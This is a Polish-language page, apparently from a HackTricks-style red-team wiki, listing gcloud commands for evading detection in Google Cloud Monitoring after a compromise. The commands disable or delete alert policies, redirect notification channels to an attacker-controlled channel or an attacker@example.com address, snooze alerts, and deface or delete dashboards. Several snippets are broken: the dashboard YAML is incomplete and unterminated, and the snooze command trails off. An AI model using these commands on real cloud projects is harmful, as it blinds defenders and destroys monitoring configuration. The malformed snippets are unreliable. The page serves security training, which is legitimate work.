GCP - Monitoring Post Exploitation

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Aby uzyskać więcej informacji, sprawdź:

GCP - Monitoring Enum

Aby poznać inne sposoby zakłócania logów, sprawdź:

GCP - Logging Post Exploitation


Usuń politykę alertów:

gcloud alpha monitoring policies delete <policy>


Zakłóć politykę alertów:

# Disable policy
gcloud alpha monitoring policies update <alert-policy> --no-enabled

# Remove all notification channels
gcloud alpha monitoring policies update <alert-policy> --clear-notification-channels

# Chnage notification channels
gcloud alpha monitoring policies update <alert-policy> --set-notification-channels=ATTACKER_CONTROLLED_CHANNEL

# Modify alert conditions
gcloud alpha monitoring policies update <alert-policy> --policy="{ 'displayName': 'New Policy Name', 'conditions': [ ... ], 'combiner': 'AND', ... }"
# or use --policy-from-file <policy-file>


Zmodyfikuj panel, aby go zakłócić:

# Disrupt dashboard
gcloud monitoring dashboards update <dashboard> --config='''
displayName: New Dashboard with New Display Name
etag: 40d1040034db4e5a9dee931ec1b12c0d
- text:
content: Hello World


Usuń pulpit:

# Delete dashboard
gcloud monitoring dashboards delete <dashboard>


Zapobiegaj generowaniu alertów przez polityki, tworząc uspokajacz:

# Stop alerts by creating a snoozer
gcloud monitoring snoozes create --display-name="Maintenance Week" \
--criteria-policies="projects/my-project/alertPolicies/12345,projects/my-project/alertPolicies/23451" \
--start-time="2023-03-01T03:00:00.0-0500" \


Zaktualizuj czas drzemki, aby zapobiec tworzeniu alertów, gdy atakujący jest zainteresowany:

# Modify the timing of a snooze
gcloud monitoring snoozes update <snooze> --start-time=START_TIME --end-time=END_TIME

# odify everything, including affected policies
gcloud monitoring snoozes update <snooze> --snooze-from-file=<file>


Usuń skonfigurowany kanał:

# Delete channel
gcloud alpha monitoring channels delete <channel>


Zaktualizuj etykiety kanału, aby go zakłócić:

# Delete or update labels, for example email channels have the email indicated here
gcloud alpha monitoring channels update CHANNEL_ID --clear-channel-labels
gcloud alpha monitoring channels update CHANNEL_ID --update-channel-labels=email_address=attacker@example.com

Ucz się i praktykuj Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE) Ucz się i praktykuj Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE)

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Last updated